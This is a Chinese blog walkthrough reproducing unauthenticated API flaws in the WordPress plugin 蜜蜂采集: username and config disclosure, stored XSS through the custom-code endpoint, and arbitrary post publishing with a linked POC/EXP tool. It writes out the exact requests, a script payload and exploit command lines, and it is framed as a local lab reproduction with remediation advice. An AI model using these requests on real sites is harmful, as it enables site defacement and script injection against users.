WordPress插件蜜蜂采集最新(2022-2-16)漏洞(XSS, WordPress用户名暴露,任意文章发布)复现
本次漏洞是WordPress的一款文章采集插件:蜜蜂采集,未对实现插件功能的相关API做鉴权;导致任何人发送的请求都会被执行。
下载漏洞复现环境:https://pan.baidu.com/s/1Oh_FX12UGpqrH0_ydoBNUA 提取码: wwi7
部分POC和EXP:https://github.com/NonAbsolute/MiFengBaiBaoXiangPluginPOCAndEXP
下载环境后解压“WordPress插件蜜蜂采集复现环境.zip”
依据README.md搭建环境,不再复述
漏洞一
WordPress用户名暴露
在该插件的采集页面如下图:
未对获取采集页面信息的API做限制,导致攻击者获得WordPress用户名等信息
我们打开检查元素并刷新页面看看POST请求
然后复制请求URL与请求内容到测试工具
URL: http://192.168.8.6:8080/wp-json/wp-beebox/v1/crawler
Content-Type: application/json
{"action":"get_config","target":"crawler"}
可以看到,不需要鉴权就获得了信息
漏洞二
XSS攻击
在该插件的“自定义代码”添加页,同样未鉴权;可轻易查询、添加自定义代码。
我们来利用测试工具发送请求看看
#查看自定义代码
URL: http://192.168.8.6:8080/wp-json/wp-beebox/v1/code
Content-Type: application/json
{"action":"fetch"}
获得了自定义代码的内容(因为没有添加自定义代码,所以为空)
#添加自定义代码
URL: http://192.168.8.6:8080/wp-json/wp-beebox/v1/code
Content-Type: application/json
{"action": "save","data": [{"title": "testCode","content": "<script>alert(\"我是邓文怡,我在广东深圳!\")</script>\n<h1>我是邓文怡,我在广东深圳!</h1>","status": "on","position": "head"}]
}
可以看到,成功添加了自定义代码,并页面也有了反应
注明:“我很喜欢这句话;我想把它写在文中;不要见怪;无伤大雅。”
漏洞三
任意文章发布
这个复现就要靠上文中的“部分POC和EXP”的下载链接了。
具体实现过程可以看看Golang代码,和Github仓库中的README.md
我们这里仅下载作者编译好的可执行文件;简单使用一下。
下载可执行文件:
创建一个文件夹,将可执行文件放进去;因为它会在执行目录产生日志
-h查看使用方式
这里我简单说明一下:
--IP 你Kali的IP
--Port 你Kali的端口,任意;只要不被占用即可
--Type 值为'POC'或者'EXP',默认POC--PayloadForTitle与--PayloadForMain
二者填一个就行,都填也可;这是--Type为EXP情况下需填的Payload。PayloadForTitle为发布文章的标题;PayloadForMain为发布文章的内容。--Type为POC的情况下可不填此项。Payload支持文件路径。--PageType 文章发布类型,是WordPress的文章还是页面;默认'Article'文章;也可填页面'Page'。--ET 渗透目标,如果不填,则为交互模式;填则为自动化模式;仅支持文件路径。文件内目标以','分隔;如:
192.168.0.1,192.168.0.2,192.168.0.3
我们使用交互模式测试一下漏洞是否存在:
./POCAndEXP-ForDarwin -IP 192.168.8.1 -Port 8080
进入交互模式,根据提示输入-h帮助
这里我再简单说明一下:
--ET 渗透目标,目标以','分隔;如:
192.168.0.1,192.168.0.2,192.168.0.3Close 退出交互模式
发现漏洞存在,如下图:
-ET 192.168.8.6:8080
我们结束POC,添加EXP参数进入EXP测试一下:
./POCAndEXP-ForDarwin -IP 192.168.8.1 -Port 8080 -Type EXP -PayloadForTitle 我是邓文怡,我在广东深圳 --PayloadForMain 我是邓文怡,我在广东深圳
发现渗透已经成功:
查看WordPress也确实添加了一篇文章:
退出EXP,我们看到当前目录产生了很多日志文件,里面记录了渗透情况:
漏洞修复建议
暂时禁用该插件,可避免被此漏洞影响。
注意⚠️,本次测试在安全环境下进行;所有代码仅限在复现环境中运行,请勿恶意篡改代码将代码运行在测试环境以外的地方;否则后果自负!
WordPress插件蜜蜂采集最新(2022-2-16)漏洞(XSS, WordPress用户名暴露,任意文章发布)复现相关推荐
- wordpress插件翻译不生效_新的恶意软件利用wordpress插件漏洞攻击数百万网站
研究人员发现,正在进行的一项针对数百万WordPress网站的恶意攻击活动,目的是利用后门和各种WordPress插件漏洞进行感染. 据wordpress统计,wordpress内容管理系统提供了近6 ...
- Wordpress插件wp-automatic采集频率设置成1秒每次
采集页面F12打开控制台运行 setInterval(function(){document.getElementById("campaign_run").click();},10 ...
- 华为二手价格表(最新2022.2.16)
华为手机用户众多,华为二手手机价格也是很多人关注的事情下面统计了下华为二手手机价格表发给大家参考下(数据来源:换换二手交易平台)
- ogc是一个非营利性组织_非营利组织的16个最佳WordPress插件
ogc是一个非营利性组织 Are you looking for the best WordPress plugins for your nonprofit's website? Due to tig ...
- wordpress 插件,wordpress 采集插件,实用wordpress 插件合集
wordpress 插件,在WordPress中除了主题以外,最重要的就要属wordpress 插件了,在某些地方来说,甚至比主题更重要,wordpress 插件往往能够帮助网站实现一些特定的功能,让 ...
- wordpress插件-wordpress中英文全套插件
从事SEO这些年,逐渐看到并看清了这个领域的许多情况.某种角度上,可以把目前存在的大多不尽如人意的地方,都归结于我们尚未对效果目标有足够的重视.比如,我们的目标是提升10000流量,那就去做1件估计能 ...
- 使用Mailgun WordPress插件增加订户
Mailgun插件的新列表订阅功能 Mailgun WordPress插件一直是简单,轻松,经济地向WordPress服务器添加出站电子邮件支持的简单方法,而无需担心运行自己的SMTP服务的麻烦. 现 ...
- 什么是WordPress插件?
不久前,我们完成了有关如何入门WordPress 的系列 文章 ,然后开始了这个简短的,分为两部分的系列文章作为后续文章. 在上一篇文章中,我们深入研究了WordPress主题是什么,如何思考它们以及 ...
- WordPress插件推荐,WordPress插件大全
WordPress插件推荐,说到这个话题就绕不开WordPress,作为全世界使用量最高的CMS,WordPress插件具有海量的插件,如果要说什么插件推荐,那只能仁者见仁智者见智了.就像CMS一样, ...
最新文章
- python就业方向及工资-Python的5大就业方向,薪资诱人前景好!
- HyperWorks2020中文版
- python 判断是否是润年及函数封装的2种方法
- 联想电脑如何下载matlab,lenovo utility是什么软件?
- 收藏 | PyTorch常用代码段合集
- 【华为云技术分享】三大前端技术(React,Vue,Angular)探密(下)
- kd树的根节点_多维空间分割树--KD树
- 平面设计师okr_掌握OKR工作法,教你快速提升工作效率
- 可能改变前端工程化未来的特性:ESM Loader Hooks
- Matplotlib画图的复杂颜色设置(包括fig, ax, spines, tick)
- 如果不懂 numpy,请别说自己是 python 程序员
- 01-利用composer创建php代码包
- 汽车之家的后台怎么统计对比记录的,怎么做数据分析?
- CDH5.15.0+spark1.6.0+hive1.1集群与zeppelin0.8.1+spark-notebook打通踩坑总结
- 5-5 圆周率Java
- Quartz中文文档使用
- 一个穷苦大学毕业生的艰辛创业路
- STM32驱动步进电机(最全的版本寄存器+HAL库实现)
- 唐诗宋词中的妙语之最
- 测试计划包括哪些主要步骤和信息?